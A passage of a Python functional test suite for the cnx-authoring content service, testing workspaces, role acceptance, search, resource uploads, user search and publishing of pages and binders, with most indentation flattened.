response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
        # trying to delete the content should return an error
self.testapp.delete('/contents/{}@draft'.format(page['id']),
status=403)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# delete user1 from the content
self.testapp.delete(
'/contents/{}@draft/users/me'.format(page['id']), status=200)
# content should not appear in user1's workspace
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), items)
self.logout()
# content should still be accessible by "you"
self.login('you')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'title': 'Multiple users test edited again by you'}, status=200)
self.logout()
# content should not appear in user1's workspace
self.login('user1')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), items)
# re-add user1 to the document
post_data = {
'id': '{}@draft'.format(page['id']),
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
def test_search_content_401(self):
self.logout()
response = self.testapp.get('/users/contents/search', status=401)
self.assert_cors_headers(response)
def test_search_content_no_q(self):
response = self.testapp.get('/users/contents/search', status=200)
result = response.json
self.assertEqual(result, {
'query': {'limits': []},
'results': {
'items': [],
'total': 0,
'limits': [],
}
})
self.assert_cors_headers(response)
def test_search_content_q_empty(self):
response = self.testapp.get('/users/contents/search?q=', status=200)
result = response.json
self.assertEqual(result, {
'query': {'limits': []},
'results': {
'items': [],
'total': 0,
'limits': [],
}
})
self.assert_cors_headers(response)
def test_search_unbalanced_quotes(self):
self.logout()
self.login('user2')
post_data = {'title': u'Document'}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
self.assert_cors_headers(response)
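        # A query with an unbalanced double quote should still be treated as
        # a plain text term instead of raising an error.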
response = self.testapp.get('/users/contents/search?q="Document', status=200)
result = response.json
self.assertEqual(result['query']['limits'],
[{'tag': 'text', 'value': 'Document'}])
self.assertEqual(result['results']['total'], 1)
self.assert_cors_headers(response)
def test_search_content(self):
post_data = {'title': u"Document"}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
self.logout()
self.login('user2')
post_data = {
'title': u"Turning DNA through resonance",
'abstract': u"Theories on turning DNA structures",
'created': u'2014-03-13T15:21:15.677617',
'revised': u'2014-03-13T15:21:15.677617',
'license': {'url': DEFAULT_LICENSE.url},
'language': u'en',
'contents': u"Ding dong the switch is flipped.",
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
doc_id = result['id']
self.assert_cors_headers(response)
post_data = {'title': u'New stuff'}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
new_doc_id = result['id']
self.assert_cors_headers(response)
        # should not be able to find other users' documents
response = self.testapp.get('/users/contents/search?q=document', status=200)
result = response.json
self.assertDictEqual(result, {
'query': {
'limits': [{'tag': 'text', 'value': 'document'}]},
'results': {
'items': [],
'total': 0,
'limits': []}})
self.assert_cors_headers(response)
# should be able to search user's own documents
response = self.testapp.get('/users/contents/search?q=DNA', status=200)
result = response.json
self.assertEqual(result['results']['total'], 1)
self.assertEqual(result['results']['items'][0]['id'],
'{}@draft'.format(doc_id))
self.assert_cors_headers(response)
# should be able to search multiple terms
response = self.testapp.get('/users/contents/search?q=new+resonance', status=200)
result = response.json
self.assertEqual(result['query']['limits'], [
{'tag': 'text', 'value': 'new'},
{'tag': 'text', 'value': 'resonance'}])
self.assertEqual(result['results']['total'], 2)
self.assertEqual(sorted([i['id'] for i in result['results']['items']]),
sorted(['{}@draft'.format(doc_id),
'{}@draft'.format(new_doc_id)]))
self.assert_cors_headers(response)
# should be able to search with double quotes
response = self.testapp.get('/users/contents/search?q="through resonance"',
status=200)
result = response.json
self.assertEqual(result['query']['limits'], [
{'tag': 'text', 'value': 'through resonance'}])
self.assertEqual(result['results']['total'], 1)
self.assertEqual(result['results']['items'][0]['id'],
'{}@draft'.format(doc_id))
self.assert_cors_headers(response)
def test_get_resource_401(self):
self.logout()
response = self.testapp.get('/resources/1234abcde', status=401)
self.assert_cors_headers(response)
def test_get_resource_403(self):
with open(get_data('1x1.png'), 'rb') as data:
upload_data = data.read()
response = self.testapp.post(
'/resources',
{'file': Upload('1x1.png', upload_data, 'image/png')},
status=201)
self.assert_cors_headers(response)
redirect_url = response.headers['Location']
with mock.patch('cnxauthoring.models.Resource.__acl__') as acl:
acl.return_value = ()
response = self.testapp.get(redirect_url, status=403)
self.assert_cors_headers(response)
def test_get_resource_404(self):
response = self.testapp.get('/resources/1234abcde', status=404)
self.assert_cors_headers(response)
def test_get_resource_html(self):
"""Test that a html resource file will get downloaded as a binary file
to avoid people using it to steal cookies etc
See https://github.com/Connexions/cnx-authoring/issues/64
"""
upload_data = b'<html><body><h1>title</h1></body></html>'
response = self.testapp.post('/resources', {
'file': Upload('a.html', upload_data,
'text/html')}, status=201)
redirect_url = response.headers['Location']
self.assert_cors_headers(response)
response = self.testapp.get(redirect_url, status=200)
self.assertEqual(response.body, upload_data)
self.assertEqual(response.content_type, 'application/octet-stream')
self.assert_cors_headers(response)
def test_get_resource(self):
with open(get_data('1x1.png'), 'rb') as data:
upload_data = data.read()
response = self.testapp.post(
'/resources',
{'file': Upload('1x1.png', upload_data, 'image/png')},
status=201)
redirect_url = response.headers['Location']
response = self.testapp.get(redirect_url, status=200)
self.assertEqual(response.body, upload_data)
self.assertEqual(response.content_type, 'image/png')
self.assert_cors_headers(response)
# any logged in user can retrieve any resource files
self.logout()
self.login('user3')
response = self.testapp.get(redirect_url, status=200)
self.assertEqual(response.body, upload_data)
self.assertEqual(response.content_type, 'image/png')
self.assert_cors_headers(response)
def test_post_resource_401(self):
self.logout()
response = self.testapp.post(
'/resources',
{'file': Upload('a.txt', b'hello\n', 'text/plain')},
status=401)
self.assert_cors_headers(response)
def test_post_resource_403(self):
with mock.patch('cnxauthoring.models.Resource.__acl__') as acl:
acl.return_value = ()
response = self.testapp.post(
'/resources',
{'file': Upload('a.txt', b'hello\n', 'text/plain')},
status=403)
self.assert_cors_headers(response)
def test_post_resource(self):
response = self.testapp.post(
'/resources',
{'file': Upload('a.txt', b'hello\n', 'text/plain')},
status=201)
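        # The resource id in the Location header appears to be the SHA-1 of
        # the uploaded bytes, which is why a duplicate upload (see
        # test_post_duplicate_resource) resolves to the same URL.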
self.assertEqual(response.content_type, 'text/plain')
self.assertEqual(response.headers['Location'],
'http://localhost/resources/'
'f572d396fae9206628714fb2ce00f72e94f2258f')
self.assertEqual(response.body,
b'/resources/'
b'f572d396fae9206628714fb2ce00f72e94f2258f')
self.assert_cors_headers(response)
def test_post_duplicate_resource(self):
response = self.testapp.post(
'/resources',
{'file': Upload('a.txt', b'hello\n', 'text/plain')},
status=201)
self.assertEqual(response.content_type, 'text/plain')
self.assertEqual(response.headers['Location'],
'http://localhost/resources/'
'f572d396fae9206628714fb2ce00f72e94f2258f')
self.assertEqual(response.body,
b'/resources/'
b'f572d396fae9206628714fb2ce00f72e94f2258f')
response = self.testapp.post(
'/resources',
{'file': Upload('a.txt', b'hello\n', 'text/plain')},
status=201)
self.assertEqual(response.content_type, 'text/plain')
self.assertEqual(response.headers['Location'],
'http://localhost/resources/'
'f572d396fae9206628714fb2ce00f72e94f2258f')
self.assertEqual(response.body,
b'/resources/'
b'f572d396fae9206628714fb2ce00f72e94f2258f')
self.assert_cors_headers(response)
def test_post_resource_exceed_size_limit(self):
two_mb = b'x' * 2 * 1024 * 1024
response = self.testapp.post(
'/resources',
# a 2MB file, size limit for tests is 1MB
{'file': Upload('a.txt', two_mb, 'text/plain')},
status=400)
self.assertIn(b'File uploaded has exceeded limit 1MB', response.body)
def test_user_search_no_q(self):
response = self.testapp.get('/users/search')
result = response.json
self.assertEqual(result, {
u'total_count': 0,
u'users': [],
})
self.assert_cors_headers(response)
def test_user_search_q_empty(self):
response = self.testapp.get('/users/search?q=')
result = response.json
self.assertEqual(result, {
u'total_count': 0,
u'users': [],
})
self.assert_cors_headers(response)
def test_user_search(self):
mock_accounts_search_results = {
u'items': [
{u'username': u'admin', u'id': 1},
{u'username': u'karenc', u'id': 6},
{u'username': u'karenchan', u'id': 4},
{u'username': u'karenchan2014',
u'first_name': u'Karen',
u'last_name': u'Chan',
u'id': 10,
u'full_name': u'Karen Chan'},
{u'username': u'user_30187', u'id': 9}
],
u'total_count': 5}
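        # The view is expected to map the accounts fields (username,
        # first_name, last_name, full_name) onto authoring's user schema
        # (id, firstname, surname, fullname), defaulting missing ones to None.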
with mock.patch('openstax_accounts.stub.OpenstaxAccounts.search'
) as accounts_search:
accounts_search.return_value = mock_accounts_search_results
response = self.testapp.get('/users/search?q=admin')
args, kwargs = accounts_search.call_args
self.assertEqual(args, ('admin',))
self.assertEqual(kwargs, {
'per_page': 10, 'order_by': 'last_name,first_name'})
result = response.json
self.assertEqual(result, {
u'users': [
{
u'id': u'admin',
u'firstname': None,
u'surname': None,
u'fullname': None,
u'suffix': None,
u'title': None,
},
{
u'id': u'karenc',
u'firstname': None,
u'surname': None,
u'fullname': None,
u'suffix': None,
u'title': None,
},
{
u'id': u'karenchan',
u'firstname': None,
u'surname': None,
u'fullname': None,
u'suffix': None,
u'title': None,
},
{
u'id': u'karenchan2014',
u'firstname': u'Karen',
u'surname': u'Chan',
u'fullname': u'Karen Chan',
u'suffix': None,
u'title': None,
},
{
u'id': u'user_30187',
u'firstname': None,
u'surname': None,
u'fullname': None,
u'suffix': None,
u'title': None,
},
],
u'total_count': 5,
})
self.assert_cors_headers(response)
def test_profile_401(self):
self.logout()
response = self.testapp.get('/users/profile', status=401)
self.assert_cors_headers(response)
def test_profile(self):
response = self.testapp.get('/users/profile', status=200)
result = response.json
self.assertEqual(result, SUBMITTER)
self.assert_cors_headers(response)
def test_user_contents_401(self):
self.logout()
response = self.testapp.get('/users/contents', status=401)
self.assert_cors_headers(response)
def test_user_contents(self):
# user1 adds a document
response = self.testapp.post_json(
'/users/contents',
{'title': 'document by default user',
'editors': [{"id": "user2"}],
}, status=201)
page = response.json
# user1 adds user3 as an author, editor, licensor and publisher
# and adds user4 as a translator
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'authors': page['authors'] + [{'id': 'user3'}],
'editors': page['editors'] + [{'id': 'user3'}],
'translators': [{'id': 'user4'}],
'licensors': page['licensors'] + [{'id': 'user3'}],
'publishers': page['publishers'] + [{'id': 'user3'}]},
status=200)
page = response.json
# user1 removes user4 as a translator
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'translators': []}, status=200)
page = json.loads(response.body.decode('utf-8'))
# the document should show up in user1's workspace
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [(i['id'], i['rolesToAccept'])
for i in result['results']['items']]
self.assertIn(('{}@draft'.format(page['id']), []), content_ids)
# user2 should be able to see the document user1 added
self.logout()
self.login('user2')
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [(i['id'], i['rolesToAccept'], i['state'])
for i in result['results']['items']]
self.assertIn(
('{}@draft'.format(page['id']), ['editors'], 'Awaiting acceptance'
), content_ids)
self.assert_cors_headers(response)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# user2 rejects the role request
self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
{'license': True,
'roles': [{'role': 'editors', 'hasAccepted': False}]},
status=200)
        # user2 should see the document with state "Rejected roles" in their
        # workspace
response = self.testapp.get('/users/contents', status=200)
result = json.loads(response.body.decode('utf-8'))
content_ids = [(i['id'], i['rolesToAccept'], i['state'])
for i in result['results']['items']]
self.assertIn(
('{}@draft'.format(page['id']), [], 'Rejected roles'), content_ids)
self.assert_cors_headers(response)
# after user2 deletes the document from the workspace, they won't see
# it anymore
self.testapp.delete('/contents/{}@draft/users/me'.format(page['id']))
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [i['id'] for i in result['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), content_ids)
self.assert_cors_headers(response)
# user3 should be able to see the document user1 added
self.logout()
self.login('user3')
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [(i['id'], i['rolesToAccept'])
for i in result['results']['items']]
self.assertIn(('{}@draft'.format(page['id']),
['authors', 'copyright_holders', 'editors',
'publishers']), content_ids)
self.assert_cors_headers(response)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# user3 should not be able to edit the document before accepting their
# role
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), {}, status=403)
# user3 rejects the editor role
self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
{'license': True,
'roles': [{'role': 'editors', 'hasAccepted': False}]},
status=200)
# user3 should still be able to view the content
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [(i['id'], i['rolesToAccept'])
for i in result['results']['items']]
self.assertIn(('{}@draft'.format(page['id']),
['authors', 'copyright_holders', 'publishers']),
content_ids)
self.assert_cors_headers(response)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# user3 accepts their other roles
self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
{'license': True,
'roles': [{'role': 'authors', 'hasAccepted': True},
{'role': 'publishers', 'hasAccepted': True},
{'role': 'licensors', 'hasAccepted': True}]},
status=200)
# user3 should be able to edit the document after accepting their
# role
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), {}, status=200)
# user4 should not be able to see the document user1 added
self.logout()
self.login('user4')
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [i['id'] for i in result['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), content_ids)
self.assert_cors_headers(response)
# user1 adds user2 as an illustrator
self.logout()
self.login('user1')
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'illustrators': [{'id': 'user2'}]}, status=200)
page = response.json
# user2 should see the document in their workspace again
self.logout()
self.login('user2')
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [(i['id'], i['rolesToAccept'], i['state'])
for i in result['results']['items']]
self.assertIn(
('{}@draft'.format(page['id']), ['illustrators'],
'Awaiting acceptance'), content_ids)
# user1 removes self from all roles
self.logout()
self.login('user1')
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'authors': [i for i in page['authors'] if i['id'] != 'user1'],
'publishers': [i for i in page['publishers']
if i['id'] != 'user1'],
'licensors': [i for i in page['licensors']
if i['id'] != 'user1']},
status=200)
# user1 should not see the document in their workspace
response = self.testapp.get('/users/contents')
result = response.json
content_ids = [i['id'] for i in result['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), content_ids)
def test_user_contents_ordering(self):
# user4 adds a document
self.logout()
self.login('user4')
date = datetime.datetime(2014, 3, 13, 15, 21, 15, 677617)
date = pytz.timezone(os.environ['TZ']).localize(date)
posting_tzinfo = pytz.timezone('America/Whitehorse')
posting_date = date.astimezone(posting_tzinfo)
from ..utils import utf8
response = self.testapp.post_json('/users/contents', {
'title': 'document by user4',
'created': utf8(posting_date.isoformat()),
'revised': utf8(posting_date.isoformat()),
}, status=201)
page = response.json
# user4 should get back the contents just posted - full content test
response = self.testapp.get('/users/contents', status=200)
result = response.json
        from ..models import TZINFO
        # Localize the resulting datetime info.
expected_result_revised_date = date.astimezone(TZINFO)
self.assertEqual(result, {
u'query': {
u'limits': [],
},
u'results': {u'items': [
{u'derivedFrom': None,
u'containedIn': [],
u'id': u'{}@draft'.format(page['id']),
u'mediaType': u'application/vnd.org.cnx.module',
u'revised': utf8(expected_result_revised_date.isoformat()),
u'state': u'Draft',
u'title': u'document by user4',
u'version': u'draft',
u'rolesToAccept': [],
}],
u'limits': [],
u'total': 1}
})
self.assert_cors_headers(response)
one_week_ago = datetime.datetime.now(TZINFO) - datetime.timedelta(7)
two_weeks_ago = datetime.datetime.now(TZINFO) - datetime.timedelta(14)
mock_datetime = mock.Mock()
mock_datetime.now = mock.Mock(return_value=one_week_ago)
with mock.patch('datetime.datetime', mock_datetime):
response = self.testapp.post_json(
'/users/contents',
{'derivedFrom': '91cb5f28-2b8a-4324-9373-dac1d617bc24@1'},
status=201)
self.assert_cors_headers(response)
mock_datetime.now = mock.Mock(return_value=two_weeks_ago)
with mock.patch('datetime.datetime', mock_datetime):
response = self.testapp.post_json(
'/users/contents',
{'title': 'oldest document by user4'}, status=201)
self.assert_cors_headers(response)
response = self.testapp.post_json(
'/users/contents', {'title': 'new document by user4'}, status=201)
self.assert_cors_headers(response)
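        # The workspace listing should be ordered by 'revised', newest first.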
response = self.testapp.get('/users/contents', status=200)
result = response.json
self.assertEqual(result['results']['total'], 4)
        for item in result['results']['items']:
            self.assertTrue(item['id'].endswith('@draft'))
titles = [i['title'] for i in result['results']['items']]
self.assertEqual(titles, [
u'new document by user4',
u'Copy of Indkøb',
u'oldest document by user4',
u'document by user4'])
derived_from = [i['derivedFrom'] for i in result['results']['items']]
self.assertEqual(derived_from, [
None, '91cb5f28-2b8a-4324-9373-dac1d617bc24@1', None, None])
self.assertEqual(response.headers['Access-Control-Allow-Credentials'],
'true')
self.assertEqual(response.headers['Access-Control-Allow-Origin'],
'http://localhost:8000')
self.assert_cors_headers(response)
def test_user_contents_hide_documents_inside_binders(self):
self.logout()
self.login('user5')
one_day_ago = datetime.datetime.now(tz=TZINFO) - datetime.timedelta(1)
one_week_ago = datetime.datetime.now(tz=TZINFO) - datetime.timedelta(7)
mock_datetime = mock.Mock()
mock_datetime.now = mock.Mock(return_value=one_day_ago)
with mock.patch('datetime.datetime', mock_datetime):
response = self.testapp.post_json(
'/users/contents',
{'title': 'single page document'}, status=201)
single_page = response.json
mock_datetime.now = mock.Mock(return_value=one_week_ago)
with mock.patch('datetime.datetime', mock_datetime):
response = self.testapp.post_json(
'/users/contents', {'title': 'page in a book'}, status=201)
page_in_book = response.json
response = self.testapp.post_json('/users/contents', {
'mediaType': 'application/vnd.org.cnx.collection',
'title': 'book',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page_in_book['id']),
},
],
},
}, status=201)
book = response.json
# since page_in_book is in book, it should not show in the workspace
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
self.assertEqual(workspace, {
u'query': {
u'limits': [],
},
u'results': {
u'items': [
{
u'containedIn': [],
u'id': u'{}@draft'.format(book['id']),
u'title': book['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': book['revised'],
u'mediaType': u'application/vnd.org.cnx.collection',
u'rolesToAccept': [],
},
{
u'containedIn': [],
u'id': u'{}@draft'.format(single_page['id']),
u'title': single_page['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': single_page['revised'],
u'mediaType': u'application/vnd.org.cnx.module',
u'rolesToAccept': [],
},
],
u'total': 2,
u'limits': [],
},
})
# remove page_in_book from book and add single_page to book
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(book['id']), {
'tree': {
'contents': [
{
'id': '{}@draft'.format(single_page['id']),
},
],
},
}, status=200)
book = response.json
# add page_in_book to a book by someone else
self.logout()
self.login('user6')
response = self.testapp.post_json('/users/contents', {
'mediaType': 'application/vnd.org.cnx.collection',
'title': 'some other book',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page_in_book['id']),
},
],
},
}, status=201)
other_book = response.json
self.logout()
self.login('user5')
# workspace should now show page_in_book and book
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
self.assertEqual(workspace, {
u'query': {
u'limits': [],
},
u'results': {
u'items': [
{
u'containedIn': [],
u'id': u'{}@draft'.format(book['id']),
u'title': book['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': book['revised'],
u'mediaType': u'application/vnd.org.cnx.collection',
u'rolesToAccept': [],
},
{
u'containedIn': [other_book['id']],
u'id': u'{}@draft'.format(page_in_book['id']),
u'title': page_in_book['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': page_in_book['revised'],
u'mediaType': u'application/vnd.org.cnx.module',
u'rolesToAccept': [],
},
],
u'total': 2,
u'limits': [],
},
})
# retrieve just pages, should now show all pages
response = self.testapp.get(
'/users/contents?mediaType=application/vnd.org.cnx.module',
status=200)
workspace = response.json
self.assertEqual(workspace, {
u'query': {
u'limits': [],
},
u'results': {
u'items': [
{
u'containedIn': [book['id']],
u'id': u'{}@draft'.format(single_page['id']),
u'title': single_page['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': single_page['revised'],
u'mediaType': u'application/vnd.org.cnx.module',
u'rolesToAccept': [],
},
{
u'containedIn': [other_book['id']],
u'id': u'{}@draft'.format(page_in_book['id']),
u'title': page_in_book['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': page_in_book['revised'],
u'mediaType': u'application/vnd.org.cnx.module',
u'rolesToAccept': [],
},
],
u'total': 2,
u'limits': [],
},
})
        # Now filter for not:Draft - should suppress all
response = self.testapp.get('/users/contents?state=not:Draft',
status=200)
workspace = response.json
self.assertEqual(workspace, {
u'query': {
u'limits': [],
},
u'results': {
u'items': [],
u'total': 0,
u'limits': [],
},
})
def test_db_restart(self):
'''
Test to see if the database resets itself after a broken
connection
'''
import psycopg2
from ..storage import storage
self.addCleanup(setattr, storage, 'conn',
psycopg2.connect(storage.conn.dsn))
storage.conn.close()
response = self.testapp.post_json(
'/users/contents',
{'title': u'My document タイトル'},
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
response = self.testapp.post_json(
'/users/contents',
{'title': u'My document タイトル'},
status=201,
expect_errors=True)
self.assertEqual(response.status, '201 Created')
def test_service_unavailable_response(self):
'''
Test service unavailable response when a request is made during a
closed or lost database connection.
'''
import psycopg2
from ..storage import storage
self.addCleanup(setattr, storage, 'conn',
psycopg2.connect(storage.conn.dsn))
storage.conn.close()
response = self.testapp.post_json(
'/users/contents',
{'title': u'My document タイトル'},
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
storage.conn.close()
response = self.testapp.get(
'/resources/1234abcde',
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
storage.conn.close()
response = self.testapp.put_json(
'/contents/1234abcde@draft.json',
{},
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
storage.conn.close()
response = self.testapp.get(
'/users/contents/search',
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
storage.conn.close()
response = self.testapp.delete(
            '/contents/1234abcde@draft',
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
@mock.patch('cnxauthoring.views.logger')
def get_database_restart_failed(self, logger):
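        # Simulate the storage restart itself failing: the request still
        # returns 503 and the failure, abort and restart errors are logged.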
import psycopg2
from ..storage import storage
self.addCleanup(setattr, storage, 'conn',
psycopg2.connect(storage.conn.dsn))
storage.conn.close()
with mock.patch.object(storage, 'restart') as mock_restart:
mock_restart.side_effect = storage.Error
response = self.testapp.post_json(
'/users/contents',
{'title': 'Test Document'},
status=503)
self.assertEqual(mock_restart.call_count, 1)
self.assertEqual(logger.exception.call_count, 3)
args1, args2, args3 = logger.exception.call_args_list
self.assertEqual(args1[0], ('Storage failure',))
self.assertEqual(args2[0], ('Storage failed to abort',))
self.assertEqual(args3[0], ('Storage failed to restart',))
class PublicationTests(BaseFunctionalTestCase):
def test_publish_401(self):
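        # Publishing without being logged in is rejected with 401.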
self.logout()
response = self.testapp.post_json('/publish', {}, status=401)
self.assert_cors_headers(response)
def test_publish_403(self):
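        # Publishing content the user has no permission on (empty ACL) is
        # rejected with 403 for both documents and binders.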
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page['id'],
],
}
with mock.patch('cnxauthoring.models.Document.__acl__') as acl:
acl.return_value = ()
response = self.testapp.post_json(
'/publish', post_data, status=403)
self.assertTrue('You do not have permission to publish'
in response.body.decode('utf-8'))
post_data = {
'title': 'Binder',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
book = response.json
post_data = {
'submitlog': u'Nueva versión!',
'items': [
book['id'],
],
}
with mock.patch('cnxauthoring.models.Binder.__acl__') as acl:
acl.return_value = ()
response = self.testapp.post_json(
'/publish', post_data, status=403)
self.assertTrue('You do not have permission to publish'
in response.body.decode('utf-8'))
def test_publish_service_not_available(self):
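        # A non-200 response from the publishing service surfaces as a 400
        # with the status code in the error message.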
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
post_data = {
'submitlog': 'Publishing is working!',
'items': [
page['id'],
],
}
with mock.patch('requests.post') as patched_post:
patched_post.return_value = mock.Mock(status_code=404)
response = self.testapp.post_json(
'/publish', post_data, status=400)
self.assertEqual(patched_post.call_count, 1)
self.assertTrue('Unable to publish: response status code: 404'
in response.body.decode('utf-8'))
self.assert_cors_headers(response)
def test_publish_response_not_json(self):
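        # A publishing service response that is not valid JSON surfaces as a
        # 400 with the response body in the error message.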
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
post_data = {
'submitlog': 'Publishing is working!',
'items': [
page['id'],
],
}
with mock.patch('requests.post') as patched_post:
patched_post.return_value = mock.Mock(
status_code=200, content=b'not json')
response = self.testapp.post_json(
'/publish', post_data, status=400)
self.assertEqual(patched_post.call_count, 1)
self.assertTrue('Unable to publish: response body: not json'
in response.body.decode('utf-8'))
self.assert_cors_headers(response)
def test_publish_single_pages(self):
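        # Publish two standalone pages and check the returned state, the
        # id -> published-version mapping and the per-draft publication id.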
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
post_data = {
'title': u'Página dos',
'content': (u'<html><body><p>Contents of Página dos</p></body>'
u'</html>'),
'abstract': 'Hola!',
'language': 'es',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_two = response.json
# User makes a publication of the two pages...
post_data = {
'submitlog': u'Nueva versión!',
'items': (page_one['id'], page_two['id'],),
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
self.assertEqual(response.json[u'state'], u'Done/Success')
expected_mapping = {
page_one['id']: '{}@1'.format(page_one['id']),
page_two['id']: '{}@1'.format(page_two['id']),
}
self.assertEqual(response.json[u'mapping'], expected_mapping)
self.assert_cors_headers(response)
# Grab the publication id for followup assertions.
publication_id = response.json['publication']
for page in (page_one, page_two,):
url = '/contents/{}@draft.json'.format(page['id'])
response = self.testapp.get(url)
self.assertEqual(response.json['state'], 'Done/Success')
self.assertEqual(response.json['publication'],
str(publication_id))
def test_publish_derived_from_single_page(self):
# Create the derived page
post_data = {
'derivedFrom': u'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
# Publish the derived page
post_data = {
'submitlog': 'Publishing is working!',
'items': [
'{}@draft'.format(page['id']),
],
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
self.assert_cors_headers(response)
publication_info = response.json
publication_id = publication_info['publication']
self.assertEqual(publication_info['state'], 'Done/Success')
self.assertEqual(publication_info['mapping'][page['id']],
'{}@1'.format(page['id']))
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']))
result = response.json
self.assertEqual(result['state'], 'Done/Success')
self.assertEqual(result['publication'], unicode(publication_id))
def test_publish_binder(self):
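        # Publish a binder together with its two pages; the binder maps to a
        # collection version (@1.1) and each page to @1.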
response = self.testapp.post_json('/users/contents', {
'title': 'Page one',
'content': '<html><body><p>Content of page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}, status=201)
page1 = response.json
self.assert_cors_headers(response)
response = self.testapp.post_json('/users/contents', {
'title': 'Page two',
'content': '<html><body><p>Content of page two</p></body></html>',
'abstract': 'gotta have one'
}, status=201)
page2 = response.json
self.assert_cors_headers(response)
response = self.testapp.post_json('/users/contents', {
'title': 'Book',
'abstract': 'Book abstract',
'language': 'de',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page1['id']),
'title': 'Page one',
},
{
'id': 'subcol',
'title': 'New section',
'contents': [
{
'id': '{}@draft'.format(page2['id']),
'title': 'Page two',
},
],
},
],
},
}, status=201)
self.assert_cors_headers(response)
binder = response.json
post_data = {
'submitlog': 'Publishing a book is working?',
'items': (binder['id'], page1['id'], page2['id'],),
}
response = self.testapp.post_json('/publish', post_data, status=200)
self.assertEqual(response.json[u'state'], u'Done/Success')
expected_mapping = {
binder['id']: '{}@1.1'.format(binder['id']),
page1['id']: '{}@1'.format(page1['id']),
page2['id']: '{}@1'.format(page2['id']),
}
self.assertEqual(response.json[u'mapping'], expected_mapping)
self.assert_cors_headers(response)
# Grab the publication id for followup assertions.
publication_id = response.json['publication']
for page in (binder, page1, page2,):
url = '/contents/{}@draft.json'.format(page['id'])
response = self.testapp.get(url)
